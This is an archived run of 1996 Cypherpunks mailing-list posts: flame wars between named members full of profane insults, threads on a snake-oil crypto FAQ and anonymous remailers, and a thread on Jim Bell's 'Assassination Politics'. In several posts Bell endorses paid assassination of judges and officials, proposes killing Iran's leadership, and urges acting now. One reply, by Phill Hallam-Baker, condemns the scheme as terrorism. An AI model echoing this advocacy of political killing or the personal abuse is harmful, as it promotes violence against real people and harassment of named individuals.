Authenticated sender is ]To: "Dr.Dimitri Vulis KOTM" ]Date: Sat, 21 Sep 1996 18:13:06 +0000 ]Mime-Version: 1.0 ]Content-Type: text/plain; charset=US-ASCII ]Content-Transfer-Encoding: 7BIT ]Subject: Re: CIA hacked ]Priority: normal ]X-Mailer: Pegasus Mail for Windows (v2.31) ]Message-Id: <843401964.17044.0 at fatmans.demon.co.uk> ] ] ]His name is Tim, or maybe you never learnt proper manners. ] ] ]> You are confused. The above question was e-mailed to me by one of Timmy May's ]> friends. I just forward their e-mail to this mailing list. I don't read it. ]> If you have any comments about Timmy May's friends not knowing English, ]> trying to insult people, and posting non-crypto-relevant political rants, ]> address them to Timmy May and his friends. ]> ]> --- ]> ]> Dr.Dimitri Vulis KOTM ]> Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps ]> ] ] Datacomms Technologies web authoring and data security ] Paul Bradley, Paul at fatmans.demon.co.uk ] Http://www.fatmans.demon.co.uk/crypt/ ] "Don`t forget to mount a scratch monkey" ] ]-----BEGIN PGP PUBLIC KEY BLOCK----- ]Version: 2.6.3ia ] ]mQCNAjH9j+cAAAEEAMBvREiQR0ot9dFCO0TiSCSunAYLv2g1Bc6I3bz8FzKXNH53 ]6mieJf/W4rD+CxJpT0q9RQaaoRtkHJLwbjfK2il3D7mEahMAyqvF/xRJNqkXfhM3 ]sRJM0Jh43l+W0M5vwokbEbk25/bxWWGspTsLD3YHbzKnG6pOcL5OPIRbv66xAAUR ]tCdQYXVsIEJyYWRsZXkgPHBhdWxAZmF0bWFucy5kZW1vbi5jby51az6JAJUDBRAy ]NwfvNkCBjDT0xHEBATQPA/9TORmN/UjNecj03q4anpvdyCLiez5sKuNbnYK50RiP ]Jj4QpWWvST3smyQ0A86DrZY/re056MXwQmARESx0rFZxdnD0oORICl5r8dJLIy3b ]j8rbA5olXwZwKz73/X5s13v/pvHYX4cIsbVK8NHXqh5llSKt6TBAuGgkIGF29z5k ]C4kAlQMFEDI3B9mdtf/umVkv7QEBcRYD/1FBteLqsUmr81euxqqnnrpLlyHb58B/ ]9sdATuua4uSjX46hXDZ264YozspNrzSB4NEdrmXOWVX3fiE0ga6XkSSkIeF23V90 ]En37Z0BdbFzgF00FRYTFyTq8eezQrdg/+rBPUsZUmG5wpq3e12FKHQsX01i+1mB2 ]YmqqwCV5e95eiQCVAgUQMh8uSb5OPIRbv66xAQEqJwP/fxQyiCasjFcbDpsFfsYp ]put5cCC/9pOx6X3DlbKShPMpUOS+A9HsTEmJQN8Iawv1nSwPdtc2cR/GhW6ilVjW ]LSloGdMVLabm9pGpZZMkRaZlXFUkOv7VhfgsUiL+vIDryBCAwUZCzQiWycjt/cPi ]mUqFH41Z7NkyO8ZFdi5GGX0= ]=CMZA ]-----END PGP PUBLIC KEY BLOCK----- Here the Timmy May clone comments on his own previous e-mail to me: ]From paul at fatmans.demon.co.uk Sun Sep 22 10:22:38 1996 ]Received: by bwalk.dm.com (1.65/waf) ] via UUCP; Sun, 22 Sep 96 11:03:51 EDT ] for dlv ]Received: from disperse.demon.co.uk by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP; ] id AA18447 for dlv at bwalk.dm.com; Sun, 22 Sep 96 10:22:38 -0400 ]Received: from post.demon.co.uk ([(null)]) by relay-2.mail.demon.net id ac21657; ] 22 Sep 96 15:21 BST ]Received: from fatmans.demon.co.uk ([158.152.120.223]) by relay-3.mail.demon.net ] id aa17072; 22 Sep 96 15:19 BST ]Received: from fatmans.demon.co.uk by fatmans.demon.co.uk with SMTP ] id AA843327445 ; Sat, 21 Sep 96 17:37:25 +0000 ]Comments: Authenticated sender is ]From: paul at fatmans.demon.co.uk ]To: "Dr.Dimitri Vulis KOTM" ]Date: Sat, 21 Sep 1996 17:37:23 +0000 ]Mime-Version: 1.0 ]Content-Type: text/plain; charset=US-ASCII ]Content-Transfer-Encoding: 7BIT ]Subject: Re: CIA hacked ]Priority: normal ]X-Mailer: Pegasus Mail for Windows (v2.31) ]Message-Id: <843401979.17072.0 at fatmans.demon.co.uk> ] ]> >Dr. John M. Grubor created the 'net. ]> ]> Who created you? You tub of shit? ] ] ]Fuck you and fuck your cheap ass fucked up life motherfucker (look ]for the fuck redundancy index here, should be an interesting figure, ]motherfucker) ] ]good day to you ] ] ] ] Datacomms Technologies web authoring and data security ] Paul Bradley, Paul at fatmans.demon.co.uk ] Http://www.fatmans.demon.co.uk/crypt/ ] "Don`t forget to mount a scratch monkey" ] ]-----BEGIN PGP PUBLIC KEY BLOCK----- ]Version: 2.6.3ia ] ]mQCNAjH9j+cAAAEEAMBvREiQR0ot9dFCO0TiSCSunAYLv2g1Bc6I3bz8FzKXNH53 ]6mieJf/W4rD+CxJpT0q9RQaaoRtkHJLwbjfK2il3D7mEahMAyqvF/xRJNqkXfhM3 ]sRJM0Jh43l+W0M5vwokbEbk25/bxWWGspTsLD3YHbzKnG6pOcL5OPIRbv66xAAUR ]tCdQYXVsIEJyYWRsZXkgPHBhdWxAZmF0bWFucy5kZW1vbi5jby51az6JAJUDBRAy ]NwfvNkCBjDT0xHEBATQPA/9TORmN/UjNecj03q4anpvdyCLiez5sKuNbnYK50RiP ]Jj4QpWWvST3smyQ0A86DrZY/re056MXwQmARESx0rFZxdnD0oORICl5r8dJLIy3b ]j8rbA5olXwZwKz73/X5s13v/pvHYX4cIsbVK8NHXqh5llSKt6TBAuGgkIGF29z5k ]C4kAlQMFEDI3B9mdtf/umVkv7QEBcRYD/1FBteLqsUmr81euxqqnnrpLlyHb58B/ ]9sdATuua4uSjX46hXDZ264YozspNrzSB4NEdrmXOWVX3fiE0ga6XkSSkIeF23V90 ]En37Z0BdbFzgF00FRYTFyTq8eezQrdg/+rBPUsZUmG5wpq3e12FKHQsX01i+1mB2 ]YmqqwCV5e95eiQCVAgUQMh8uSb5OPIRbv66xAQEqJwP/fxQyiCasjFcbDpsFfsYp ]put5cCC/9pOx6X3DlbKShPMpUOS+A9HsTEmJQN8Iawv1nSwPdtc2cR/GhW6ilVjW ]LSloGdMVLabm9pGpZZMkRaZlXFUkOv7VhfgsUiL+vIDryBCAwUZCzQiWycjt/cPi ]mUqFH41Z7NkyO8ZFdi5GGX0= ]=CMZA ]-----END PGP PUBLIC KEY BLOCK----- ]From paul at fatmans.demon.co.uk Sun Sep 22 10:23:35 1996 ]Received: by bwalk.dm.com (1.65/waf) ] via UUCP; Sun, 22 Sep 96 11:03:52 EDT ] for dlv ]Received: from disperse.demon.co.uk by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP; ] id AA18472 for dlv at bwalk.dm.com; Sun, 22 Sep 96 10:23:35 -0400 ]Received: from post.demon.co.uk ([(null)]) by relay-2.mail.demon.net id ae22319; ] 22 Sep 96 15:23 BST ]Received: from fatmans.demon.co.uk ([158.152.120.223]) by relay-3.mail.demon.net ] id aa17051; 22 Sep 96 15:19 BST ]Received: from fatmans.demon.co.uk by fatmans.demon.co.uk with SMTP ] id AA843329594 ; Sat, 21 Sep 96 18:13:14 +0000 ]Comments: Authenticated sender is ]From: paul at fatmans.demon.co.uk ]To: "Dr.Dimitri Vulis KOTM" ]Date: Sat, 21 Sep 1996 18:13:06 +0000 ]Mime-Version: 1.0 ]Content-Type: text/plain; charset=US-ASCII ]Content-Transfer-Encoding: 7BIT ]Subject: Re: Re: CIA hacked ]Priority: normal ]X-Mailer: Pegasus Mail for Windows (v2.31) ]Message-Id: <843401966.17051.0 at fatmans.demon.co.uk> ] ] ]This is a further post following an earlier flame: ] ]> You are being flamed because. ]> ]> [X] you continued a boring useless stupid thread ]> [ ] you repeatedly posted to the same thread that you just posted to ]> [x] you repeatedly initiated incoherent, flaky, and mindless threads ]> [ ] you posted a piece riddled with profanities ]> [ ] you advocated Net censorship ]> [ ] you SCREAMED! (used all caps) ]> [x] you posted some sort of crap that doesn't belong in this group ]> [ ] you posted the inanely stupid 'Make Money Fast' article ]> [ ] you threatened others with physical harm ]> [x] you made a bigoted statement(s) ]> [x] you repeatedly assumed unwarranted moral or intellectual superiority ]> [x] you are under the misapprehension that this list is your preserve ]> [ ] you repeatedly shown lack of humor ]> [ ] you are apparently under compulsion to post to every thread ]> [x] you are posting an anonymous attack ]> ]> >>> Thank you for the time you have taken to read this. Live n' Learn.<<< ] ]Furthermore, you qualify as the celebrity fuckhead of the week, have ]a nice day. ] ] ] Datacomms Technologies web authoring and data security ] Paul Bradley, Paul at fatmans.demon.co.uk ] Http://www.fatmans.demon.co.uk/crypt/ ] "Don`t forget to mount a scratch monkey" ] ]-----BEGIN PGP PUBLIC KEY BLOCK----- ]Version: 2.6.3ia ] ]mQCNAjH9j+cAAAEEAMBvREiQR0ot9dFCO0TiSCSunAYLv2g1Bc6I3bz8FzKXNH53 ]6mieJf/W4rD+CxJpT0q9RQaaoRtkHJLwbjfK2il3D7mEahMAyqvF/xRJNqkXfhM3 ]sRJM0Jh43l+W0M5vwokbEbk25/bxWWGspTsLD3YHbzKnG6pOcL5OPIRbv66xAAUR ]tCdQYXVsIEJyYWRsZXkgPHBhdWxAZmF0bWFucy5kZW1vbi5jby51az6JAJUDBRAy ]NwfvNkCBjDT0xHEBATQPA/9TORmN/UjNecj03q4anpvdyCLiez5sKuNbnYK50RiP ]Jj4QpWWvST3smyQ0A86DrZY/re056MXwQmARESx0rFZxdnD0oORICl5r8dJLIy3b ]j8rbA5olXwZwKz73/X5s13v/pvHYX4cIsbVK8NHXqh5llSKt6TBAuGgkIGF29z5k ]C4kAlQMFEDI3B9mdtf/umVkv7QEBcRYD/1FBteLqsUmr81euxqqnnrpLlyHb58B/ ]9sdATuua4uSjX46hXDZ264YozspNrzSB4NEdrmXOWVX3fiE0ga6XkSSkIeF23V90 ]En37Z0BdbFzgF00FRYTFyTq8eezQrdg/+rBPUsZUmG5wpq3e12FKHQsX01i+1mB2 ]YmqqwCV5e95eiQCVAgUQMh8uSb5OPIRbv66xAQEqJwP/fxQyiCasjFcbDpsFfsYp ]put5cCC/9pOx6X3DlbKShPMpUOS+A9HsTEmJQN8Iawv1nSwPdtc2cR/GhW6ilVjW ]LSloGdMVLabm9pGpZZMkRaZlXFUkOv7VhfgsUiL+vIDryBCAwUZCzQiWycjt/cPi ]mUqFH41Z7NkyO8ZFdi5GGX0= ]=CMZA ]-----END PGP PUBLIC KEY BLOCK----- ]From paul at fatmans.demon.co.uk Sun Sep 22 10:51:12 1996 ]Received: by bwalk.dm.com (1.65/waf) ] via UUCP; Sun, 22 Sep 96 11:03:58 EDT for dlv ]Received: from disperse.demon.co.uk by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP; ] id AA19533 for dlv at bwalk.dm.com; Sun, 22 Sep 96 10:51:12 -0400 ]Received: from post.demon.co.uk ([(null)]) by relay-2.mail.demon.net id ad22319; ] 22 Sep 96 15:23 BST ]Received: from fatmans.demon.co.uk ([158.152.120.223]) by relay-3.mail.demon.net ] id aa17045; 22 Sep 96 15:19 BST ]Received: from fatmans.demon.co.uk by fatmans.demon.co.uk with SMTP ] id AA843329593 ; Sat, 21 Sep 96 18:13:13 +0000 ]Comments: Authenticated sender is ]From: paul at fatmans.demon.co.uk ]To: "Dr.Dimitri Vulis KOTM" ]Date: Sat, 21 Sep 1996 18:13:06 +0000 ]Mime-Version: 1.0 ]Content-Type: text/plain; charset=US-ASCII ]Content-Transfer-Encoding: 7BIT ]Subject: Re: Dimitri Spams ]Priority: normal ]X-Mailer: Pegasus Mail for Windows (v2.31) ]Message-Id: <843401965.17045.0 at fatmans.demon.co.uk> ] ] ]Killifiling you would be a pleasure, however, it is an even greater ]pleasure to be able to flame you because of your worthless posts, ]this is probably why he didn`t... ] ]Get a life. ] ] ]> > Dimitri, get a life! We need Dimitri Spams as much as we needed ]> > Perrygrams. Which is to say, we need them not at all! ]> ]> I see you lied when you claimed to have killfiled me. ]> ]> --- ]> ]> Dr.Dimitri Vulis KOTM ]> Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps ]> ] ] Datacomms Technologies web authoring and data security ] Paul Bradley, Paul at fatmans.demon.co.uk ] Http://www.fatmans.demon.co.uk/crypt/ ] "Don`t forget to mount a scratch monkey" ] ]-----BEGIN PGP PUBLIC KEY BLOCK----- ]Version: 2.6.3ia ] ]mQCNAjH9j+cAAAEEAMBvREiQR0ot9dFCO0TiSCSunAYLv2g1Bc6I3bz8FzKXNH53 ]6mieJf/W4rD+CxJpT0q9RQaaoRtkHJLwbjfK2il3D7mEahMAyqvF/xRJNqkXfhM3 ]sRJM0Jh43l+W0M5vwokbEbk25/bxWWGspTsLD3YHbzKnG6pOcL5OPIRbv66xAAUR ]tCdQYXVsIEJyYWRsZXkgPHBhdWxAZmF0bWFucy5kZW1vbi5jby51az6JAJUDBRAy ]NwfvNkCBjDT0xHEBATQPA/9TORmN/UjNecj03q4anpvdyCLiez5sKuNbnYK50RiP ]Jj4QpWWvST3smyQ0A86DrZY/re056MXwQmARESx0rFZxdnD0oORICl5r8dJLIy3b ]j8rbA5olXwZwKz73/X5s13v/pvHYX4cIsbVK8NHXqh5llSKt6TBAuGgkIGF29z5k ]C4kAlQMFEDI3B9mdtf/umVkv7QEBcRYD/1FBteLqsUmr81euxqqnnrpLlyHb58B/ ]9sdATuua4uSjX46hXDZ264YozspNrzSB4NEdrmXOWVX3fiE0ga6XkSSkIeF23V90 ]En37Z0BdbFzgF00FRYTFyTq8eezQrdg/+rBPUsZUmG5wpq3e12FKHQsX01i+1mB2 ]YmqqwCV5e95eiQCVAgUQMh8uSb5OPIRbv66xAQEqJwP/fxQyiCasjFcbDpsFfsYp ]put5cCC/9pOx6X3DlbKShPMpUOS+A9HsTEmJQN8Iawv1nSwPdtc2cR/GhW6ilVjW ]LSloGdMVLabm9pGpZZMkRaZlXFUkOv7VhfgsUiL+vIDryBCAwUZCzQiWycjt/cPi ]mUqFH41Z7NkyO8ZFdi5GGX0= ]=CMZA ]-----END PGP PUBLIC KEY BLOCK----- --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From frissell at panix.com Sun Sep 22 11:08:34 1996 From: frissell at panix.com (Duncan Frissell) Date: Mon, 23 Sep 1996 02:08:34 +0800 Subject: Going AP Shit on the Internet Message-ID: <3.0b19.32.19960922114342.00b00688@panix.com> At 01:06 AM 9/22/96 -0700, Dale Thorn wrote: >If you live >in the U.S., that govt. is your agent, carrying out your >representatives' instructions, and paid with your tax dollars. Unless >and until this becomes a literal dictatorship (and there is a valid >argument that it applies even then), you are responsible for whatever >your paid agents do, from the street cop to the top politico. >whether you, I, or Joe Blow is more guilty, for lack of participation or >some other citizen crime, but you can't put all the blame on your hired >agents for their crimes, when you know very well what kinds of things >they do, and you continue to fund them. You have to be considered an >accessory, at least. I hereby dismiss all employees of the federal, state, or local governments who may be working as my employees or agents and specifically disclaim all actions they take on my part. Note, BTW that your argument is the same as saying "If one pays taxes, one is subject to Nurenberg liability for government crimes." Which is therefore an argument in favor of tax evasion. DCF From dlv at bwalk.dm.com Sun Sep 22 11:57:12 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Mon, 23 Sep 1996 02:57:12 +0800 Subject: Going AP Shit on the Internet In-Reply-To: Message-ID: jonathon writes: > In the fight against terrorism, let us remember the > biggest terrorist of the all --- the united states of > america, which exports more death, destruction and mayhem > that the rest of the world combined. Hear, hear. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From jimbell at pacifier.com Sun Sep 22 12:00:57 1996 From: jimbell at pacifier.com (jim bell) Date: Mon, 23 Sep 1996 03:00:57 +0800 Subject: Assassination Politics, was Kiddie porn on the Internet Message-ID: <199609221638.JAA09586@mail.pacifier.com> At 12:56 AM 9/22/96 -0400, Rabid Wombat wrote: > > >On Sat, 21 Sep 1996, jim bell wrote: > >> At 01:51 PM 9/17/96 -0700, Steve Schear wrote: >> >>On Mon, 16 Sep 1996, Steve Schear wrote: >> >> >> >>> Someone wrote: >> >>> We've all heard these arguments, but are they true? Who says so, and how >> >>> can they be certain? Jim's suggestion has never, to my knowledge, been >> >>> tried on a consistant, large, scale. When all conventional alternatives >> >>> have been tried and fail, what have we or the starving children got to >> >>> lose? >> >> >> >>I think "Lord of the Flies" answers this question quite well. >> > >> >Does it? LOTF was fiction. Can you identify a recent instance in which a >> >non-governmental organization attempted to influence political/military >> >events via a concerted AP? >> > >Where is Jimmy Hoffa? And it worked! Jim Bell jimbell at pacifier.com From jimbell at pacifier.com Sun Sep 22 12:04:30 1996 From: jimbell at pacifier.com (jim bell) Date: Mon, 23 Sep 1996 03:04:30 +0800 Subject: timmy waxes a widdle on AP Message-ID: <199609221630.JAA09213@mail.pacifier.com> At 03:05 AM 9/22/96 EDT, Dr.Dimitri Vulis KOTM wrote: >I was reading the other day about the lessons learned from the one-time >tax refund in 1975. Most consumers realized that this is a one-time deal >and saved most of it, rather than spent it. On the other hand, after Reagan's >tax cuts the consumers spent much of their newly retained income because they >believed that the lower tax rate would continue for a few years. > >Likewise once an occasional gubment official in Mexico is assassinated >often enough for the population to perceive public service as being a >hazardous profession, they'll have trouble recruiting the replacements. >Assassinations won't work as long as they're perceived by the public as >zero-probability events. The public perception depends on other factors >besides the numbers or the frequency of the hits. That's generally correct. The "they'll just hire replacements" argument is given by people who don't understand that under full operation of AP, THINGS WILL CHANGE! And once things start changing, they will change very rapidly. Jim Bell jimbell at pacifier.com From jimbell at pacifier.com Sun Sep 22 12:25:12 1996 From: jimbell at pacifier.com (jim bell) Date: Mon, 23 Sep 1996 03:25:12 +0800 Subject: Kill 'em and let God sort it out, was Re: The GAK Momentum is Building... Message-ID: <199609221651.JAA10237@mail.pacifier.com> At 10:04 PM 9/21/96 -0700, Steve Schear wrote: >> jim bell wrote: >>Naturally, you won't even consider the possibility of going outside the >>system to solve a problem. The rest of us notice that there are probably >>thousands of terminally-ill people who would gladly act as a human kamikaze >>and get rid of any judge inclined to impose such a fine, for a payment of 1% >>of this principle amount to a family member or loved one, leaving 99% >>available for the few other judges foolish enough to basically commit >>suicide by taking up a futile gesture. >> > >If AP came to be seen as an acceptable way for business and citizens to >right egregious wrongs it would quickly lead to a 'law of the jungle' >situation, which I think any sane person would reject as the cure being >worse than the disease. Don't assume that means anything definitive, however. _SOME_ sane people are simply WRONG! Indeed, I'm fond of pointing out that 95% of the things people say are wrong about AP are, themselves, wrong. (Even by the standards of people who'd agree with their general conclusion.) Suppose I could convince you that an AP-dominated world would be, in general, far safer, better, more just, than the status quo. At that point, would you STILL say "any sane person would reject" it? Probably not. I suggest, therefore, that your statement above is based on a misunderstanding of AP. Other people, people who have thought about the matter far longer than you, agree with me. Moreover, after discussing AP with as many people as I have, it's quite predictable that a person would come to a conclusion based on a false belief. However, if governemnts (especially ours) continue >to expand their implied authority and greatly diminishing personal >liberties we all took for granted were inaliable human rights (in our own >best interest, of course), a time may come when a bit of rebellion may be >the only viable alternative for self-correction. Here's the big problem: Let's suppose you think like this. "Someday we _may_ have to rebel. Not today." Gradually, over time, the circumstances get worse. However, as surprising as it may seem, we get used to the problems, and morever a new generation of people are born who've never seen freedom. The line we draw in the sand today just appears to get further and further away. We never cross it, and thus we never rebel, no matter how bad the circumstances get. The most realistic position to take, I think, is to conclude that the line in the sand has ALREADY been crossed, long ago, and that it is high time to act. The beauty of AP is that it will allow "little revolutions" to occur daily, until they are no longer needed. Jim Bell jimbell at pacifier.com From dthorn at gte.net Sun Sep 22 12:25:53 1996 From: dthorn at gte.net (Dale Thorn) Date: Mon, 23 Sep 1996 03:25:53 +0800 Subject: Snake-Oil FAQ In-Reply-To: <199609220854.DAA27487@mailhub.amaranth.com> Message-ID: <32456CE1.B60@gte.net> William H. Geiger III wrote: > In , on 09/21/96 at 04:47 PM, > Lance Cottrell said: > >I am setting up just such a list. I plan to award products for both > >excellent and lousy crypto. This really should be a committee (yuch) > >effort, so if you would like to participate, please let me know. > I would be intrested in this. I would like to see the following > information made available for any product that made it on to the > list: > Detailed listings of pro/cons of the product. > Contact with the authors & listing of any rebutials they may have for > the cons. > A appendix to the list explaining why the individule points are a pro > or a con for crypto products. When you get right down to it, this calls for a mini-encyclopedia of crypto products (or even sub-products such as pre-processors or "encryption engines"). The basic outline for any products included (and don't forget, just getting included is some sort of endorsement, if you know what I mean) could be a feature/bug listing, using common crypto terminology, and could be followed by side-by-side argument paragraphs from the author and from a reputable review panel. The usefulness of the list would probably depend on: 1. The participation of all those names people like to name-drop on this forum. 2. And/or the quality of the list itself if done without (1.) above. In this latter case, it could still be useful, but the variances in evaluation owing to personal bias would be difficult to overcome. From jimbell at pacifier.com Sun Sep 22 12:38:00 1996 From: jimbell at pacifier.com (jim bell) Date: Mon, 23 Sep 1996 03:38:00 +0800 Subject: AP [was: Re: Kiddie porn on the Internet] [NOISE] Message-ID: <199609221651.JAA10247@mail.pacifier.com> At 05:32 AM 9/22/96 -0500, William H. Geiger III wrote: >In <199609220708.AAA20288 at dfw-ix2.ix.netcom.com>, on 09/22/96 at 12:09 AM, > Bill Stewart said: >>If the US _had_ really wanted to assassinate Saddam, they could have >>hired professionals to do the job (like Mossad.) Instead they >>killed 200,000 other Iraqis, including civilians, draftees, and a >>few tens of thousands of real soldiers. > >You need to take into account the politics of the region. With Saddam gone you have >created a power vaccume that Iran would be all to happy to fill. It was for this >reason that durring the Gulf War the US & its allias (European & Arab) did not go to >Bagdad. They mearly wanted to knock Saddam down a notch or two not take him out. You're thinking like a statist. If Saddam's death leaves "a power vacuum," then simply kill the leadership of Iran, and any other nearby state with designs on the middle east. Gee, whats the problem? This "kill the leadership" system gets mighty addictive! Where will it end? Which is why it isn't started in the first place. The people who might start it are the ones with the most to lose if it spreads. That's why Saddam is alive today. Jim Bell jimbell at pacifier.com From hallam at vesuvius.ai.mit.edu Sun Sep 22 12:45:20 1996 From: hallam at vesuvius.ai.mit.edu (hallam at vesuvius.ai.mit.edu) Date: Mon, 23 Sep 1996 03:45:20 +0800 Subject: AP [was: Re: Kiddie porn on the Internet] [NOISE] In-Reply-To: <199609220708.AAA20288@dfw-ix2.ix.netcom.com> Message-ID: <9609221638.AA16343@vesuvius.ai.mit.edu> I agree with Bill, AP sounds like a very good club for the Exon types to beat us with. Jim's latest comments sounded no different to me than the mealy mouthed "understanding" messages that Sinn Fein publish about the IRA. Given the opportunity to condem any attack on the President under AP rules we get a non commital non-condemnation. Its the type of thing that Gerry Adams says after his men have just killed two kids with a bomb in a litterbin outside a MacDonalds. Ideology is a powerful political weapon. It simplifies complex political issues and generates momentum allowing political change. Unfortunately it also creates bad government as ideology persued for the sake of ideology. Ideology does not debate, it acts. When Marxism was created in the latter half of the 19th century it had many usefull effects. In particular it definitely assisted the transition from monarchy to democracy by creating a widespread belief that the existing situation was unstable. By the end of the first world war however this energy had largely served whatever purpose it would, at least in Europe if not in other parts of the world. Unfortunately a very large number of people had failed to realise that it was an ideology whose time had come and gone. The industrial and political situation it addressed no longer existed. The major left wing movements by that time were socialism and liberalism, both of which rejected the Marxist extreeme. As the Marxist idealogues got frustrated by their evident lack of progress they turned to terrorism. The Bader Minehof gang believed that they could spark the revolution by jolting society out of its complacency. Their strategy was remarkably like AP. If the heads of large corporations were likely to be assasinated then noone would want to lead a large firm. In fact as any person with counter terrorism experience will tell you the threat of death is remarkably ineffective as a means of intimidation. It creates the opposite effect, strengthening the resolve of the target. I discussed this point recently with someone close to Mossad who agreed. Terrorism is becomming an increasing concern. The amount of damage an individual can cause is much greater than that possible in the past. There are plenty of exhausted ideologies about which can be fashioned into a justification of murder. Jim's post shows very clearly how Libertarianism can be converted into a justification for terrorism. Its a very short gap between being opposed to government and actively fighting against it. I see libertarianism as the exhausted remnant of the mercantilism of the 1980s. As constructed it recognises only those rights which favour the privileged in society and none of those which benefit the ecconomically disadvantaged. Politically it reached its peak influence almost a decade ago when Regan and Thatcher were at their zenith. The '94 congress will probably be seen as the turning point in the political tide with the mainstream of politics moving back to the left again. There will always be people arround who conclude that the failure was not being close enough to the ideology. If the libertarians are not carefull they will be inexorably linked in the public mind with the terrorists who act in their name. Phill From jamesd at echeque.com Sun Sep 22 12:50:04 1996 From: jamesd at echeque.com (James A. Donald) Date: Mon, 23 Sep 1996 03:50:04 +0800 Subject: Timmy May's spam (Was: Re: CIA hacked) Message-ID: <199609221727.KAA00049@dns2.noc.best.net> At 08:55 AM 9/22/96 EDT, Dr.Dimitri Vulis KOTM frothed: > I'm not "worried", since Timmy May has already earned the reputation of a > nutcase and a liar in these circles, Back to the kill file. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From nobody at replay.com Sun Sep 22 12:57:37 1996 From: nobody at replay.com (Anonymous) Date: Mon, 23 Sep 1996 03:57:37 +0800 Subject: Macintosh Mixmaster port... Who's doing it? In-Reply-To: Message-ID: <199609221731.TAA18577@basement.replay.com> "Myers W. Carpenter" wrote: > Does anyone have any idea who might be attempting a Macintosh > Mixmaster port? I and some other people were eyeing the idea. If you > know who might be doing this port I would appreciate hearing from them. > Thanks. > myers You can run mixmaster on a mac, see http://mklinux.apple.com/ From tcmay at got.net Sun Sep 22 13:26:59 1996 From: tcmay at got.net (Timothy C. May) Date: Mon, 23 Sep 1996 04:26:59 +0800 Subject: Snake-Oil FAQ Message-ID: At 4:44 PM 9/22/96, Dale Thorn wrote: >The basic outline for any products included (and don't forget, just >getting included is some sort of endorsement, if you know what I mean) >could be a feature/bug listing, using common crypto terminology, and >could be followed by side-by-side argument paragraphs from the author >and from a reputable review panel. > >The usefulness of the list would probably depend on: >1. The participation of all those names people like to name-drop on this > forum. >2. And/or the quality of the list itself if done without (1.) above. > In this latter case, it could still be useful, but the variances in > evaluation owing to personal bias would be difficult to overcome. The Basic Problem (tm) with a "Snake Oil FAQ" is that the very persons most in need of it won't read it. If those who post descriptions of their "Unbreakable Virtual Whammo-Matic Really Complicated Transposition Cipher" have not bothered to read Schneier or other basic texts on ciphers, why would they bother to read a Snake Oil FAQ? This applies to their customers as well. It doesn't take much reading of standard crypto books to learn why historical codes and ciphers (and their reinvented modern variants) are fundamentally weak, and subject to (usually rapid) breaking with high-speed computers. Once this basic point is realized, all else follows. In other words, there is really no meaningful target audience for a Snake Oil FAQ. If it's just a quick effort, fine. But escalating it into a Major Cypherpunks Project seems like wasted effort. Just point people to Schneier's book and suggest they read and absorb the first several chapters. Then, like the infamous fisherman, they'll be equipped to understand why the Whammo-matic Really Complicated Cipher is neither Virtually Unbreakable nor worthy of spending much time analyzing, and why they should stick with modern ciphers and systems which have been subjected to years of review and attempts to break them. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From mixmaster at remail.obscura.com Sun Sep 22 13:52:09 1996 From: mixmaster at remail.obscura.com (Mixmaster) Date: Mon, 23 Sep 1996 04:52:09 +0800 Subject: Jena Remailer Message-ID: <199609221720.KAA15948@sirius.infonex.com> lutz at as-node.jena.thur.de wrote to All: >> Also, is there any other remailer (now that anon.penet.fi is down) >> that allows one to have an anonymous address to receive >> email? l> anon at as-node.jena.thur.de. But it's is bit tricky. The trickiest thing about it - by far - is the inscrutable English translation of the helpfile. I have been trying for over a week to make any sense of how to use the remailer. Granted, it works differently than the other pseudonymous remailers, but the helpfile is simply impenatrable. Like many translations, it is grammatical but makes no sense in spots. >From what I can make out, this is probably a very useful and innovative remailer that I should very much like to use. Can any native English speaker please paraphrase the account start-up procedure for us? Is mixmaster at as-node.jena.thur.de a standard T-1/T-2 remailer? Who has the key? Fingering this account doesn't work from West Coast USA. Thanks for any help... From jjacobs at mail.koyote.com Sun Sep 22 13:56:24 1996 From: jjacobs at mail.koyote.com (Joel Jacobs) Date: Mon, 23 Sep 1996 04:56:24 +0800 Subject: [Fwd: Re: All Bets Off] Message-ID: <2.2.32.19960922183603.00698770@mail.koyote.com> I just got passed this, don't know the context, nor the thread. Clancy was NOT a Navy captain. He does tons of research for his books....his advisor IS a retired Navy Captain named J.M. Rodgers. How do I know? I also use Captain Rodgers as a consultant, AND, I e-mail with Clancy a couple or three times a week. BTW: I'm a retired U.S. Navy Chief Journalist. HTH. Joel Jacobs Co-author of the soon to be published, "Death Watch" >Return-Path: betsat at texoma.com >Date: Sun, 22 Sep 1996 13:22:27 -0500 >From: >To: jjacobs at mail.koyote.com >Subject: [Fwd: Re: All Bets Off] > >The Deviant wrote: >> >> On Thu, 19 Sep 1996, Daniel Christopher Miskell wrote: >> >> > Date: Thu, 19 Sep 1996 11:30:32 -0400 >> > From: Daniel Christopher Miskell >> > To: Rabid Wombat >> > Cc: cypherpunks at toad.com >> > Subject: Re: All Bets Off >> > >> > >On Tue, 17 Sep 1996, Jeff Davis wrote: >> > > >> >> [lots of quoting rm'd] >> >> > >> > Tom Clancy is not a military-hired brain, but to make his novels realistic and >> > to do justice to the people he portrays, he does a LOT of research. He is a >> > highly respected author, and I have no doubt that his statement is based on >> > his personal findings, collected for a previous novel. >> > >> >> I beleive he was also a Capain in the Navy... >> >> --Deviant >> Old MacDonald had an agricultural real estate tax abatement. > >-- >---------------------------------- >Bernie and Shirley Taner >betsat at texoma.com >---------------------------------- >Path: 